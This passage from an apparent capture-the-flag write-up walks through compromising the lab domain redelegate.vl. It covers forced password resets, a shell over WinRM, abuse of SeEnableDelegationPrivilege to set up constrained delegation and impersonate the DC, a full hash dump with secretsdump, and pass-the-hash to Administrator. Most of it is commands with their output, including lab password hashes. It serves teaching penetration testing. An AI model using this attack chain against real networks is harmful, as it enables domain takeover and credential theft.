[2025-07-15T15:01:52Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=redelegate,DC=vl
[2025-07-15T15:01:52Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-07-15T15:01:54Z INFO rusthound_ce::ldap] All data collected for NamingContext CN=Configuration,DC=redelegate,DC=vl
[2025-07-15T15:01:54Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-07-15T15:01:55Z INFO rusthound_ce::ldap] All data collected for NamingContext CN=Schema,CN=Configuration,DC=redelegate,DC=vl
[2025-07-15T15:01:55Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-07-15T15:01:55Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=DomainDnsZones,DC=redelegate,DC=vl
[2025-07-15T15:01:55Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-07-15T15:01:55Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=ForestDnsZones,DC=redelegate,DC=vl
[2025-07-15T15:01:55Z INFO rusthound_ce::json::parser] Starting the LDAP objects parsing...
[2025-07-15T15:01:55Z INFO rusthound_ce::json::parser] Parsing LDAP objects finished!
[2025-07-15T15:01:55Z INFO rusthound_ce::json::checker] Starting checker to replace some values...
[2025-07-15T15:01:55Z INFO rusthound_ce::json::checker] Checking and replacing some values finished!
[2025-07-15T15:01:55Z INFO rusthound_ce::json::maker::common] 12 users parsed!
[2025-07-15T15:01:55Z INFO rusthound_ce::json::maker::common] 64 groups parsed!
[2025-07-15T15:01:55Z INFO rusthound_ce::json::maker::common] 2 computers parsed!
[2025-07-15T15:01:55Z INFO rusthound_ce::json::maker::common] 1 ous parsed!
[2025-07-15T15:01:55Z INFO rusthound_ce::json::maker::common] 3 domains parsed!
[2025-07-15T15:01:55Z INFO rusthound_ce::json::maker::common] 2 gpos parsed!
[2025-07-15T15:01:55Z INFO rusthound_ce::json::maker::common] 73 containers parsed!
[2025-07-15T15:01:55Z INFO rusthound_ce::json::maker::common] .//20250715150155_redelegate-vl_rusthound-ce.zip created!
RustHound-CE Enumeration Completed at 15:01:55 on 07/15/25! Happy Graphing!
Lately it seems different collectors are missing things, so I’ll also collect with netexec:
oxdf@hacky$ netexec ldap dc.redelegate.vl -u Marie.Curie -p 'Fall2024!' --bloodhound --collection All --dns-server 10.129.234.50
LDAP 10.129.234.50 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.234.50 389 DC [+] redelegate.vl\Marie.Curie:Fall2024!
LDAP 10.129.234.50 389 DC Resolved collection methods: group, trusts, session, acl, rdp, container, psremote, dcom, localadmin, objectprops
LDAP 10.129.234.50 389 DC Done in 0M 18S
LDAP 10.129.234.50 389 DC Compressing output into /home/oxdf/.nxc/logs/DC_10.129.234.50_2025-07-15_150807_bloodhound.zip
By doing both Python and Rust I get better coverage. In this case, RustHound-CE didn’t catch what I need to move forward.
I’ll start the Bloodhound-CE docker instance, and upload the data. I’ll mark marie.curie as owned, and look at outbound control:
As a member of Helpdesk, marie.curie has ForceChangePassword over several other users. If I use the “Shortest paths from Owned objects” built-in query, it looks like there’s a path all the way to GenericAll over the FS01 computer object through Helen.Frost:
Click for full size imageHelen.Frost is also in the Remote Management Users group, which means I can get a shell and explore the computer file system as well.
Shell
I’ll reset Helen.Frost’s password using netexec:
oxdf@hacky$ netexec smb dc.redelegate.vl -u Marie.Curie -p 'Fall2024!' -M change-password -o USER=helen.frost NEWPASS=Password123
SMB 10.129.234.50 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:False)
SMB 10.129.234.50 445 DC [+] redelegate.vl\Marie.Curie:Fall2024!
CHANGE-P... 10.129.234.50 445 DC [+] Successfully changed password for helen.frost
It works:
oxdf@hacky$ netexec smb dc.redelegate.vl -u Helen.Frost -p Password123
SMB 10.129.234.50 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:False)
SMB 10.129.234.50 445 DC [+] redelegate.vl\Helen.Frost:Password123
oxdf@hacky$ netexec winrm dc.redelegate.vl -u Helen.Frost -p Password123
WINRM 10.129.234.50 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl)
WINRM 10.129.234.50 5985 DC [+] redelegate.vl\Helen.Frost:Password123 (Pwn3d!)
I’ll get a shell:
oxdf@hacky$ evil-winrm-py -i dc.redelegate.vl -u helen.frost -p Password123
▘▜ ▘
█▌▌▌▌▐ ▄▖▌▌▌▌▛▌▛▘▛▛▌▄▖▛▌▌▌
▙▖▚▘▌▐▖ ▚▚▘▌▌▌▌ ▌▌▌ ▙▌▙▌
▌ ▄▌ v1.1.2
[*] Connecting to dc.redelegate.vl:5985 as helen.frost
evil-winrm-py PS C:\Users\Helen.Frost\Documents>
And user.txt:
evil-winrm-py PS C:\Users\Helen.Frost\desktop> cat user.txt
57c60164************************
Shell as Administrator
Enumeration
Filesystem
Helen.Frost’s home directory is very empty, and can’t access the other user’s home directories:
evil-winrm-py PS C:\Users> tree /f .
Folder PATH listing
Volume serial number is 000001CA 5171:55DF
C:\USERS
+---Administrator
+---Helen.Frost
¦ +---Desktop
¦ ¦ user.txt
¦ ¦
¦ +---Documents
¦ +---Downloads
¦ +---Favorites
¦ +---Links
¦ +---Music
¦ +---Pictures
¦ +---Saved Games
¦ +---Videos
+---Public
+---sql_svc
At the root of the drive, there’s nothing unusual:
evil-winrm-py PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/10/2025 4:07 AM inetpub
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 6/3/2025 12:37 PM Program Files
d----- 6/3/2025 12:37 PM Program Files (x86)
d-r--- 6/3/2025 12:38 PM Users
d----- 4/10/2025 4:10 AM Windows
inetpub\ftproot has the FTP files:
evil-winrm-py PS C:\> ls inetpub\ftproot
Directory: C:\inetpub\ftproot
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/20/2024 1:11 AM 434 CyberAudit.txt
-a---- 10/20/2024 5:14 AM 2622 Shared.kdbx
-a---- 10/20/2024 1:26 AM 580 TrainingAgenda.txt
inetpub\wwwroot shows the empty webserver:
evil-winrm-py PS C:\> ls inetpub\wwwroot
Directory: C:\inetpub\wwwroot
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/19/2024 2:50 AM 703 iisstart.htm
-a---- 10/19/2024 2:50 AM 99710 iisstart.png
Privilege
helen.frost has an interesting privilege:
evil-winrm-py PS C:\> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeEnableDelegationPrivilege has to do with configuring delegation in Active Directory.
Delegation
Background
There are three types of delegation in Windows Active Directory:
- Unconstrained delegation - A machine configured with this mechanism has the ability to store a TGT for any user that connects to it, and use those to authenticate as those users. To configure this, an account with
SeEnableDelegationPrivilegewill modify theuserAccountControlattribute of the machine to include theTRUSTED_FOR_DELEGATIONflag. - Constrained delegation - A machine configured with this mechanism is able to impersonte a user to a specific defined machine. The
TRUSTED_TO_AUTHENTICATE_FOR_DELEGATIONflag onuserAccountControlis set (by a user withSeEnableDelegationPrivilege), and themsDS-AllowToDelegateattribute is set to the SPN that the machine can authenticate to. - Resource-based constrained delegation (RBCD) - This configuration allows a machine to control who can delegate to it.
SeEnableDelegationPrivilegeis not involved here.
Strategy
RBCD isn’t really relevant given the privilege here.
To exploit unconstrained delegation, I would typically add a computer account and a DNS record, set that computer up for unconstrained delegation, and then coerce the DC to authenticate to it. Unfortunately the MachineAccountQuota for this domain is 0:
oxdf@hacky$ netexec ldap dc.redelegate.vl -u marie.curie -p 'Fall2024!' -M maq
LDAP 10.129.234.50 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.234.50 389 DC [+] redelegate.vl\marie.curie:Fall2024!
MAQ 10.129.234.50 389 DC [*] Getting the MachineAccountQuota
MAQ 10.129.234.50 389 DC MachineAccountQuota: 0
I don’t have permissions to add DNS records either. I could consider using FS01$ (which Helen.Frost has GenericAll over), but this isn’t a real computer I can actually access.
Constrained Delegation
To exploit constrained delegation, I’ll configure it on FS01$:
evil-winrm-py PS C:\> Set-ADAccountControl -Identity "FS01$" -TrustedToAuthForDelegation $True
evil-winrm-py PS C:\> Set-ADObject -Identity "CN=FS01,CN=COMPUTERS,DC=REDELEGATE,DC=VL" -Add @{"msDS-AllowedToDelegateTo"="ldap/dc.rede
legate.vl"}
Now this computer is allowed to act as the LDAP service on the DC.
I’ll change the computer accounts password:
oxdf@hacky$ netexec smb dc.redelegate.vl -u helen.frost -p Password123 -M change-password -o USER='FS01$' NEWPASS=Password123
SMB 10.129.234.50 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:False)
SMB 10.129.234.50 445 DC [+] redelegate.vl\helen.frost:Password123
CHANGE-P... 10.129.234.50 445 DC [+] Successfully changed password for FS01$
Now I can request a service ticket for the LDAP service:
oxdf@hacky$ getST.py 'redelegate.vl/FS01$:Password123' -spn ldap/dc.redelegate.vl -impersonate dc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating dc
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in dc@ldap_dc.redelegate.vl@REDELEGATE.VL.ccache
This saves a ticket that I can use to authenticate to the LDAP service on the DC as the DC machine account. I’ll use that to dump the hashes:
oxdf@hacky$ KRB5CCNAME=dc@ldap_dc.redelegate.vl@REDELEGATE.VL.ccache secretsdump.py -k -no-pass dc.redelegate.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ec17f7a2a4d96e177bfd101b94ffc0a7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9288173d697316c718bb0f386046b102:::
Christine.Flanders:1104:aad3b435b51404eeaad3b435b51404ee:79581ad15ded4b9f3457dbfc35748ccf:::
Marie.Curie:1105:aad3b435b51404eeaad3b435b51404ee:a4bc00e2a5edcec18bd6266e6c47d455:::
Helen.Frost:1106:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
Michael.Pontiac:1107:aad3b435b51404eeaad3b435b51404ee:f37d004253f5f7525ef9840b43e5dad2:::
Mallory.Roberts:1108:aad3b435b51404eeaad3b435b51404ee:980634f9aabfe13aec0111f64bda50c9:::
James.Dinkleberg:1109:aad3b435b51404eeaad3b435b51404ee:2716d39cc76e785bd445ca353714854d:::
Ryan.Cooper:1117:aad3b435b51404eeaad3b435b51404ee:062a12325a99a9da55f5070bf9c6fd2a:::
sql_svc:1119:aad3b435b51404eeaad3b435b51404ee:76a96946d9b465ec76a4b0b316785d6b:::
DC$:1002:aad3b435b51404eeaad3b435b51404ee:bfdff77d74764b0d4f940b7e9f684a61:::
FS01$:1103:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:db3a850aa5ede4cfacb57490d9b789b1ca0802ae11e09db5f117c1a8d1ccd173
Administrator:aes128-cts-hmac-sha1-96:b4fb863396f4c7a91c49ba0c0637a3ac
Administrator:des-cbc-md5:102f86737c3e9b2f
krbtgt:aes256-cts-hmac-sha1-96:bff2ae7dfc202b4e7141a440c00b91308c45ea918b123d7e97cba1d712e6a435
krbtgt:aes128-cts-hmac-sha1-96:9690508b681c1ec11e6d772c7806bc71
krbtgt:des-cbc-md5:b3ce46a1fe86cb6b
Christine.Flanders:aes256-cts-hmac-sha1-96:ceb5854b48f9b203b4aa9a8e0ac4af28b9dc49274d54e9f9a801902ea73f17ba
Christine.Flanders:aes128-cts-hmac-sha1-96:e0fa68a3060b9543d04a6f84462829d9
Christine.Flanders:des-cbc-md5:8980267623df2637
Marie.Curie:aes256-cts-hmac-sha1-96:616e01b81238b801b99c284e7ebcc3d2d739046fca840634428f83c2eb18dbe8
Marie.Curie:aes128-cts-hmac-sha1-96:daa48c455d1bd700530a308fb4020289
Marie.Curie:des-cbc-md5:256889c8bf678910
Michael.Pontiac:aes256-cts-hmac-sha1-96:eca3a512ed24bb1c37cd2886ec933544b0d3cfa900e92b96d056632a6920d050
Michael.Pontiac:aes128-cts-hmac-sha1-96:53456b952411ac9f2f3e2adf433ab443
Michael.Pontiac:des-cbc-md5:833dc82fab76c229
Mallory.Roberts:aes256-cts-hmac-sha1-96:c9ad270adea8746d753e881692e9a75b2487a6402e02c0c915eb8ac6c2c7ab6a
Mallory.Roberts:aes128-cts-hmac-sha1-96:40f22695256d0c49089f7eda2d0d1266
Mallory.Roberts:des-cbc-md5:cb25a726ae198686
James.Dinkleberg:aes256-cts-hmac-sha1-96:c6cade4bc132681117d47dd422dadc66285677aac3e65b3519809447e119458b
James.Dinkleberg:aes128-cts-hmac-sha1-96:35b2ea5440889148eafb6bed06eea4c1
James.Dinkleberg:des-cbc-md5:83ef38dc8cd90da2
Ryan.Cooper:aes256-cts-hmac-sha1-96:d94424fd2a046689ef7ce295cf562dce516c81697d2caf8d03569cd02f753b5f
Ryan.Cooper:aes128-cts-hmac-sha1-96:48ea408634f503e90ffb404031dc6c98
Ryan.Cooper:des-cbc-md5:5b19084a8f640e75
sql_svc:aes256-cts-hmac-sha1-96:1decdb85de78f1ed266480b2f349615aad51e4dc866816f6ac61fa67be5bb598
sql_svc:aes128-cts-hmac-sha1-96:88f45d60fa053d62160e8ea8f1d0231e
sql_svc:des-cbc-md5:970d6115d3f4a43b
DC$:aes256-cts-hmac-sha1-96:0e50c0a6146a62e4473b0a18df2ba4875076037ca1c33503eb0c7218576bb22b
DC$:aes128-cts-hmac-sha1-96:7695e6b660218de8d911840d42e1a498
DC$:des-cbc-md5:3db913751c434f61
[*] Cleaning up...
Shell
I’ll use wmiexec.py to get a shell using the administrator account’s hash:
oxdf@hacky$ wmiexec.py redelegate.vl/administrator@dc.redelegate.vl -hashes :ec17f7a2a4d96e177bfd101b94ffc0a7
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
And grab root.txt:
C:\users\administrator\desktop>type root.txt
3b1d4070************************